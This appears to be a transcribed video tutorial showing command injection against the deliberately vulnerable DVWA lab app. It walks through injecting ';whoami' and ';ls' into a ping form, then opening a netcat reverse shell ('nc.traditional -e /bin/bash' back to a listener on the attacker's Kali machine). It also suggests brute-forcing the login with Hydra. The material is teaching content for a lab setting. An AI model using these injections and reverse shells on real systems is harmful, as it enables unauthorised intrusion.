Hello everybody and welcome back to this tutorial, and in this one we're going to take a look at a specific type of the attack on a website which is called command injection. Now for this actual video and for this tutorial we're going to need the help of our OS virtual machine that we installed, so you can simply just run it in your VirtualBox right here. In my case I already started it up, I already logged in, so only thing we are interested in right now is the actual IP address of our virtual machine. So type ifconfig. As soon as it starts up, we can see that the IP address of the OS virtual machine is 192.168.1.8. So let's go to our Firefox. In our Firefox, let's go to the 192.168.1.8, and here is the page that we already saw previously once we installed it, that comes with the OWASP. Now, the actual folder or the directory that we want to go to is the damn vulnerable web application. So if you scroll all the way down, you will see it right here, damn vulnerable web application, or DVWA. Click on it right here, and you will notice right here that it asks for the actual username and password. Now, if you want to, the username and password for this actual page is admin, but you can also take a try. Now that you know the password and the username, you can also take a try with the Hydra tool that we covered previously and try to actually brute force this page with the same users and passwords.txt that we used in the tutorial video with Hydra. So you can just give it an actual try, you can test your skills, whether you learned it properly. All you need to do is, for example, go to the view page source, find the actual form for the username and password, and here it is, form. You want to see to which page is it going to, or to which actual PHP file in this case is it going to as soon as it actually logs in, and it is going to log in.php, so that's what you need to specify between the double quotes in the Hydra command once you specify the path. For the user, you need to specify, let's find the ID and name for the user, username equals, and then those two upper arrows, capital user, password equals, those two upper arrows, and then capital pass. And also submit equals login. So in the previous tutorial example we had submit equals submit. In this actual example you will have submit equals login, and then you would specify the capital -L and capital -P for the users.txt and passwords.txt. But we are not going to do that right now because we already covered that, so let's go and just simply log in. Let's save this username and password right here, and here is the actual menu or the opening page for the DVWA. Actual attack that we are interested in, as I said previously, is called the command injection, or in this case, as it says right here, command execution. Now, what this basic attack simply does is, let's imagine that you have a website similar to this, or exactly, let's actually just give it an example on a website similar to this one, which says ping for free. So you connect to a certain website. Let's simply just try to find something that is similar to the actual damn vulnerable web application page right here. So this is a website that actually pings other machines for free. So let's try to type ping a website. Let's see whether there is an actual website that does this. Free ping test tool, ping your server or website. So let's click on this one. So this is an actual real website that allows you to ping your own website simply just by typing in the domain name or the website name or the server name right here. Okay, so for example type facebook.com and you click here ping now, and what this will do is it will ping your actual website and retrieve some information right here. We have the same website right here, just it is a good possibility that this one is not really vulnerable and this one is purposely made vulnerable for us to exploit it. So how does the pinging for free works? Well, basically if you find a website like this, or like this in our case, and you simply just type in the IP address of your website that you want to ping, what this server has to do in order to ping your website is it has to take your input that you actually put right here and run it in its terminal, or in its server, should I say. So for example, let's pretend that our Cal Linux machine is an actual website that's hosting this pinging server. And let's say the user of this website types in IP address 192.168.1.1. What this Kali Linux machine will do is it will go to its terminal and type 192 or ping 192.168.1.1. And then it will ping that website, for example, let's say 4 times, so -C4, and it will ping it 4 times and retrieve the information that it got right here back to the user right here. So let's see how this actual website works. Let's type the same IP address, so we want to ping 192.168.1.1. Let's submit this, wait for a few seconds, and you can see we got the same output right here. Just this pinged 3 times and we pinged in our terminal 4 times. Therefore, we can actually conclude that it is running this IP address within a ping command that looks something like this, or identically looks like something like this. So ping this IP address -C for 3 times, so it will ping it 3 times and it will retrieve the exact same information that we got right here. But the problem comes with, what if we try to run a command that simply just doesn't ping, that does something else? For example, we know that in our terminal on Kali Linux we can run who am I, and it will give us the actual output, who are we. In this case we are root. But what if right here I simply just type who am I? Well, we will not get any type of output, which is good in this case, but the only reason why we didn't get any type of output is because we didn't define the actual command well enough. So we know that this actual website pings a different website, so it will look something like this, ping, and then 192.168.1.1. But we also know, or pardon me, let's add the -C and then 3, but we also know that we can separate 2 different commands in our Kali Linux terminal with colon and dot, or with dot and comma. And let's run something like this. So it will ping it 3 times, and then we'll get an output right after of who am I. So this is the actual example of running 2 commands at the same time. So what if we use this actual dot and comma sign and separate the command from the IP address that we type right here? So we know that once we type 192.168.1.1 and press here enter, it will give us an output of pinging the actual target 3 times. But what if we type 192.168.1.1 and then dot and comma and then who am I? If it is vulnerable, it will run the actual second command as well and give us an output. And in this case, it really did. So we can see right here that we got an output www/data. Now, if we want to simply just check this, we can go to our OWASP virtual machine and type the whoami command. Let's try to run something else. So let's try to run 192.168.1.1 and then dot and comma and then ls. So we know that it should list out the directory as soon as it executes. And we can see right here, it does list it out. We have the help, the index.php, and the source file. The command execution works. You can even leave it out without the pinging, so you can simply just type right away the dot and comma, and then type ls, and it will only execute the ls command. Because the dot and comma simply indicates to the terminal that the previous command has finished, and then it should actually execute the second command. That we know that it is vulnerable, let's see how we can actually exploit this target and gain access to its system. Let's try to create a connection between our machine and target machine, or OWASP in this case, using this vulnerability. We're going to use a tool called netcat to perform connection requests. So for our own machine, we need to set up a port for listening connections, and then we will send command to the target machine to connect back to us, performing something similar to reverse shell connection. Now, we already covered some of these steps in the system hacking section, but we're going to use a different tool to perform the same task right now. As I said, we're going to use netcat, and in Kali Linux, in order to actually use netcat, you can simply just type either netcat, so nc is a short term for netcat, and -h will give you a help menu right here. We can see the actual help menu right here, and we want to set up an actual listening on our Kali Linux machine for the incoming connections on a specific port. So we can add 3 different settings. For example, nc will be the starting of the command, and then -lvp. And before you actually ask what lvp is, let us take a look right here. So let's first search for L. Here is the L. So we will set our Kali Linux into listen mode for inbound connections. Now we need the V, V stands for verbose. We want to use twice to be more verbose. We don't really need to use it twice. We can simply just use it once for the verbose. And P is ports, as we can see local port number. So right after the P, we need to set up a number or the actual port that we want to listen on. So let's listen on the port 1, 2, 3, 4, 5. Okay, so this is the command that we actually need to run on our Kali Linux machine. And let's click here, enter. It will print out listening on any port or on any IP address or interface in this case on port 1, 2, 3, 4, 5. Now it's time to run the actual command injection on target machine and make the target machine connect back to us. So in order to do that, we need to connect back from the target machine to Kali Linux machine also by using netcat. So right here we can simply just type dot and comma in order to actually stop the previous command and execute the second command, so that we don't really need to type an IP address right here. It is not needed. You can do it if you want to, but it is not needed. And then we want to type nc, standing for netcat, dot traditional, and we want to execute a bin bash. So from the bin bash directory, we want to specify that this actual target should connect back to the IP address of our Kali Linux machine on the port 1, 2, 3, 4, 5. So first of all, I will simply just see what the IP address of my Kali Linux machine is, and in my case it is 192.168.1.7. So right here what I'm going to do is after the nc.traditional, I will simply just specify -e for the bin bash, so /bin and then /bash, and right after it you specify the IP address of your Kali Linux machine, or the machine that is actually listening for the incoming connections, so 192.168.1.7, and after it you specify the port that it is listening on. As soon as you click here submit, you will see that it will continue loading this page forever. It will not give any output right here, but in our Kali Linux machine we can see that we got connect to our IP address from the IP address of the OWASP virtual machine over this port right here. Now we can execute any terminal commands that we want on target machines. For example, if I just type ls, you will see the same output as previous. If I go one directory back and type ls, you will see that we got a different directory and different actual files right here. If I just type pwd, we will see in which directory are we currently. Whoami will give us the output www.data. We can see the gateway for our target. So you can execute any terminal commands that you can execute in the actual Kali Linux terminal right here as well. So you can, for example, let's go right here, pwd, and let's type mkdir test and cd test pwd. Yeah, it doesn't seem to actually be able to create the directories, possibly because we are not a root account, but it doesn't really matter. We actually managed to exploit the target machine and gain access to it simply just by using the command injection, and now we can actually execute commands on our target machine. That will be basically about it for the command injection. I hope you enjoyed this tutorial. It is really useful to know this type of the attack, as it is a little bit common here and there, but we're also going to cover in future videos some more advanced type of the attacks and some of the attacks that are occurred more commonly than this one, such as for example XSS attack and SQL injection attack. So that would be about it for this tutorial. I hope you enjoyed it, and I hope I will see you in the next one. Bye!